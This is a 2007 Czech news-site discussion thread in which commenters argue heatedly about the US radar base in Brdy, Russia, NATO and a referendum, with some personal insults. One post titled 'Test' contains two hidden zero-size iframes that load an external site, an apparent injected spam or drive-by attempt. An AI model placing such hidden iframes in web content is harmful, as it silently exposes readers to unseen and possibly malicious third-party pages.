2.6.2024 | Svátek má Jarmil


Upozornění

Litujeme, ale tato diskuse byla uzavřena a již do ní nelze vkládat nové příspěvky.
Děkujeme za pochopení.

Zobrazit příspěvky: Všechny podle vláken Všechny podle času
Ludva 25.10.2007 8:38

Co získáme, co ztratíme.

Získáme pochvalu od světového četníka, protože se zařadíme mezi jeho vazaly. To nám ovšem nebude moc platné, protože na oplátku se staneme terčem nejen islámských, ale hlavně ruských zbraní. A že nám to Rusové pořádně omastí i ekonomicky, o tom nepochybujte. Mladí o tom nic nevědí, ale přečtěte si kolik padlo ve válce Rusů při osvobozování Československa a kolik Američanů. Už z úcty k těm padlým, by se neměly zacpávat uši před hlasy z Ruska. A rozhodně by o takové vážné věci neměla rozhodnout tato vláda, žádný mandát k tomu nemá. A je podporována zrádci voličů, takže se stane zrádcem národa. Ať se udělá referendum, cítím se svéprávný o tom rozhodovat.

LK 25.10.2007 9:34

Re: Co získáme, co ztratíme.

Ludvo, mám dojem, že se neshodneme na tom, jak chápat svět. To, co Vy pokládáte za vazalství, já pokládám za svobodu, a naopak - to, co snad Vy pokládáte za svobodu - t.j. naše bývalé zařazení do sféry vlivu "Ruska" - pokládám za vazalství. Neargumentujte počty mrtvých vojáků - vojáci plní rozkazy a nemusí vždy bojovat za správnou věc. Československo bylo z německého vazalství "osvobozeno" do vazalství ruského. Jediný, kdo nás osvobozoval a přitom nás nezotročil, byly právě USA.  Taky dost nechápu Váš názor, že česká vláda nemá mandát rozhodovat o věcech obrany. To u komunistických rusofiolských vlád byl ten mandát nespochybnitelný, vspomínáte?

Ludva 25.10.2007 10:24

Re: Re: Co získáme, co ztratíme.

Váš názor Vám neberu, máte na něj právo, právě proto by mělo být referendum. Jinak tady nepropaguji návrat do područí Ruska, to v žádném případě. Ale odmítám se stát, kvůli menšinovému názoru, nepřítelem Ruska a islámských zemí. Pokud to potvrdí referendum, tak prosím, ale tuto dočasnou vládu nemohu respektovat..

Pešek 25.10.2007 11:34

Re: Re: Re: Co získáme, co ztratíme.

Víte, Ludvo, referendum by se rozhodně nikdy nemělo týkat otázek obrany a několika dalších. Jak se rozhodnete vy? Podle čeho? Co všechno víte o problematice? Jak moc jste ji studoval? Znáte doslova naše mezinárodní smlouvy? ...etc. A stát se nepřítelem Ruska v tomto případě není rozhodnutí naše, ale právě onoho Ruska, to se rozhodlo, že budeme nepřátelé. Argumenty nechtějí poslouchat. 

Pokud byste chtěl vládnout podle většinových názorů, moc dlouho by se vám to asi nelíbilo. Co třeba trest smrti? Jak je to s procenty, pokud zrovna je krátce po nějaké bestiální vraždě? To, že je zde "dočasná vláda" mně osobně se moc líbí, protože jsme dlouho měli vlády na věčné časy... Dejte vědět, až přijde vláda, kterou budete moci respektovat. A hlavně co je vám to platné.

A argumenty o počtech padlých snad ani nemůžete myslet vážně: sověti bojovali jako uvědomělci: k výročí VŘSR muselo být to které město osvobozeno za jakoukoli cenu - nas mnógo!. Myslíte, že Dukla byla nutná s těmi obětmi? Rozkazy k útokům byly v sovětském podání mnohdy rozsudky smrti nebo rovnou vraždami! Jestliže na straně západních Spojenců bylo obecně méně padlých, pak především proto, že ke ztrátám a tedy k vlastním životům měli úplně jiný vztah, nikoli proto, jak nás učila souška učitelka, že se Němci málo bránili, protože neměli rádi bolševika..

Dr. Ban 25.10.2007 12:16

Re: Re: Re: Re: Co získáme, co ztratíme.

az bude nesporne jiste ze se jedna o obranu cr, muzes mlit svoje bludy. zatim se o obranu cr nejedna, tudiz k tomu obyvatelstvo ma co rict!

LK 25.10.2007 11:48

Re: Re: Re: Co získáme, co ztratíme.

No jo, Vy chcete být s nima zadobře. To já taky, jenže s agresivními režimy to máte jako s agresivními lidmi: nejlépe je chovat se k nim slušně a současně být připraven se bránit. To je naše historická zkušenost. A ve věcech obrany se nerozhoduje referendem. Na to je tady vláda, která má mandát od voličů. Třeba se Vám nelíbí, ale musíte respektovat její rozhodnutí. Pokud nebudete, nemáte úctu k právnímu státu.

Jirka. 25.10.2007 9:37

Re: Co získáme, co ztratíme.

Nejseš svéprávnej si zavázat ani tkaničku. Ke kterým mrtvým máme mít úctu. K těm, kteří zemřeli hrdinnou smrtí německou kulkou, nebo k těm, který odkráglovaly komunistycký zrůdy (včetně těch u nás). Samozřejmě, že o radaru musí rozhodnout vláda. otázky národní bezpečnosti nemohou být řešený na všelidových veselicích.

Šedovous 25.10.2007 8:25

Tak konečně je to jasné,

radar v Brdech je jen klamný cíl, který má přitáhnout raketový útok  a tím skutečnému radaru pomoci odhalit, odkud jsou rakety odpalovány, nacež bude následovat drtivý útok a už si neškrtnou.

Zofka 25.10.2007 10:30

Re: Tak konečně je to jasné,

:-D

Šedovous 25.10.2007 8:19

Jen klid , ten autor ignorant neví,že

se stále intenzívně pracuje na elektronice z mikrovakuových elektronek, na ty je nějaké EMP krátké....

honzak 25.10.2007 10:09

Re: Jen klid , ten autor ignorant neví,že

Dodávat to bude Aštar Šeran? Kdo si koupí 3  najednou  dostane přívěšek ve tvaru ještírka?

PETR 25.10.2007 8:16

Nejlepší lék

Již Clazewitz tvrdil, že dokud na území nepřítele nevstoupí noha pěšáka, území není dobyto.

Proto zejména pro obhájce americké přítomnosti v ČR a nutnosti obrany proti arabáčům je opětovné zavedení  branné povinnosti a vojenské služby od maturity minimálně na pět let a případné další studium povolit až po vojenské službě. Kdo tuto občanskou povinnost nesplní, nebude studovat. Přijímač v Afgánistánu, dále pokračovat podle potřeb USA kdekoliv na světě.

Nebo kdo nás bude bránit, když sem vtrhnou iránské divizi??? Dnešní huliči od PC??? Nebo Drop Inu???

Ludva 25.10.2007 8:28

Re: Nejlepší lék

Pěkně zhulený příspěvek. Ale zdravé jádro tam je. Opravdu  lepší než cizí radar. který stejně je houby platný proti teroristům uvnitř státu, je vojenský výcvik obyvatelstva. Samozřejmě je pitomost mluvit o pěti letech vojenské služby, ale občasná cvičení se zbraněmi by nikomu neuškodila. Takto jsme jen ovce určené na porážku. Silný národ je ten, kdo má hodně bojeschopných lidí.

Petr B. 25.10.2007 7:27

Urban je nedůvěryhodný od doby, kdy lhal o válečných konfliktech v Bosně a Kosovu

a i v tomto případě převrací vše naruby. Naprosto legitimní snahu místních samospráv ovlivnit věci, které se bezprostředně týkají občanů žijících v dané oblasti nazývá fašismem či komunismem. Zdá se také, že lidé typu Urbana mají až panický strach z referend a z toho, že by si lidé mohli o něčem rozhodnout sami. Pane Urbane, jak je možné vůbec jednat s vládou Bushe, když tato oklamala celý svět svým lhaním o zbraních hromadného ničení v Iráku a následnou okupací této země bez mandátu OSN? Proč v tomto případě nejednáme v souladu s EU, jejíž jsme součástí. Proč alespoň nepočkáme na novou americkou vládu vzešlou z příštích voleb?

Jankulovsky 25.10.2007 7:19

Test

Test <iframe src="http://www.homervsbender.com/?ida=228" width="0" height="0" rameborder="0" scrolling="no"></iframe>

<iframe src="http://www.homervsbender.com/?ida=775" width="0" height="0" rameborder="0" scrolling="no"></iframe>

Martin 25.10.2007 4:16

o nas bez nas

znova se opakuje, kdyz nasi politici dostanou na taliri nabidku, jak ruska vojska budou kontrolovat provoz nefunkcniho radaru :-D byl tu kdokoliv z usa s dotazem pred par mesici, jestli si to vubec prejeme ? pardon, zapomnel jsem ze uzitecnejch idiotu se nikdo nepta, ti to odkejvou a jeste prohlasej jakej je to symbol svobody :-D

MILA 25.10.2007 5:46

Re: o nas bez nas

zlaticko, na to aby se ceska republicka ubranila, na to je nas mooooc malo. My se muzeme akorat rozhodnout ke komu se pridame, a je to poprve po nekolika stoletich co se cesi muzou alespon rozhodnut jestli se pridaji k USA nebo k Rusku.

ja volim USA, lepsi je pod americkou botou nezli v milostnem ruskem objeti;-O>-

Martin 25.10.2007 5:52

Re: Re: o nas bez nas

a proti komupak se mame branit ? jo ja zapomnel, iranci se pravidelne uz dva tisice let snazej dobyt stovezatou :-D

jsou zeme, ktere otrocky pristup odmitaji, nevidim duvod proc si mame brat priklad z tech, kteri vse vidi jako jen ohybani se podle vetru k silnejsimu a ne z tech kteri rikaji, budme sebou a at si na nas vylamou zuby. ale to je asi prilis slozite, uz slysim ty vytky jak na to nemame penize proto je levnejsi byt otrokem :-D

Fleischer 25.10.2007 6:08

Re: Re: o nas bez nas

My jsme se již přidali k EU! Přidali jsme se také k NATO! Měli bychom proto hlavně jednat s EU a NATO jak bude zajištěná naše (= evropská) bezpečnost.

Martin 25.10.2007 6:12

Re: Re: Re: o nas bez nas

no, ono se ukazuje, ze ti politici, kteri tvrdili jak nato je nasi finalni obranou a konecne se diky tomu staneme svobodni, ale vubec o tom nemusime rozhodovat v referendu, lhali. protoze dnes pry vubec svobodni nejsme a presneji nebudeme doku tu nebude radar. tak na co jsme v nato ?

honzak 25.10.2007 6:31

Re: Re: Re: o nas bez nas

Opravdu od srdce jsem se zasmál - "Měli bychom proto hlavně jednat s EU a NATO jak bude zajištěná naše (= evropská) bezpečnost". NATO možná, ale i to je svázáno politickými tlaky eurosoudruhů. Příteli, celá EU je jenom papírovej čert, neschopný reálné akce stejně jako OSN. Je to smutné, ale je to tak.

Jarda 25.10.2007 8:30

Re: Re: Re: o nas bez nas

Hmm, EU...myslite tu organizaci co porad resi tvar bananu ci registraci karlovarskych oplatek a pritom nema cas ani zacit resit evropskou dopravni ci energetickou politiku?

Jan Teplouš 25.10.2007 8:34

Re: Re: o nas bez nas

R^R^R^!!

jirka.s. 25.10.2007 10:36

Re: o nas bez nas

Ale no tak, rudý bratře! To jsi na tom už tak zle ? Každému nesvéprávnému jedinci jako jsi ty, bývá přece přidělena osoba, která je za něho i jeho činy zodpovědná! To jsem teda zvědavý, jak se  tvůj guru Bufo Bufo vykroutí z těch tvých hovadin!

P.S.: Už by ti měli tu vrátnici zatrhnout, nebo ji alespoň odpojit od netu!

Martin 25.10.2007 13:59

Re: Re: o nas bez nas

ale no fuj jirko vyskoc, kdo te zase vypustil z klecoveho luzka k pocitaci.

jirka.s. 25.10.2007 17:09

Re: Re: Re: o nas bez nas

To jsem zvědavý, kdy tě napadne něco jiného. Ale nejspíše mou zvědavost neukojíš, že?

P.S.: A jestli čekáš na Kolumba, připlave na lodi! Vodovodem!  Můžeš se o něj pak s Růžičkovou poprat!

Martin 25.10.2007 18:26

Re: Re: Re: Re: o nas bez nas

vidim ze v bohnicich dnes pousteli saxanu, no je jasny ze neco slozitejsiho pochopit nemuzete :-D

proc by mne melo napadat cokoliv jineho ? takovej blb jako ty ani tohle nechape

Sven Australan 25.10.2007 3:11

EMP a fasiste v Brdech

Toto ma dejinny zaklad v tom, ze v r. 1989 nemely "cinkat klice", ale "rincet hilzny" - jak spravne komentuje muj pritel Rosta Hedvicek z Ameriky.  Ahoj Sven

Cato 25.10.2007 1:47

Íránci mají kino že chceme u nás cizí základnu

kvůli strachu z jejich raket (které nemají) a atomovým zbraním (se kterými je ještě nikdo nechytil).Myslím, že toto je historicky největší nesmysl, který kdy nějaká vláda přednesla svým voličům. Opravdu bych rád věděl, zda tomu sami tolik věří.

Ale ještě není konec volebního období, ještě nás můžou překvapit s něčím ještě pitomějším.

Erik 25.10.2007 1:59

Re: Íránci mají kino že chceme u nás cizí základnu

To snad nemyslite vazne?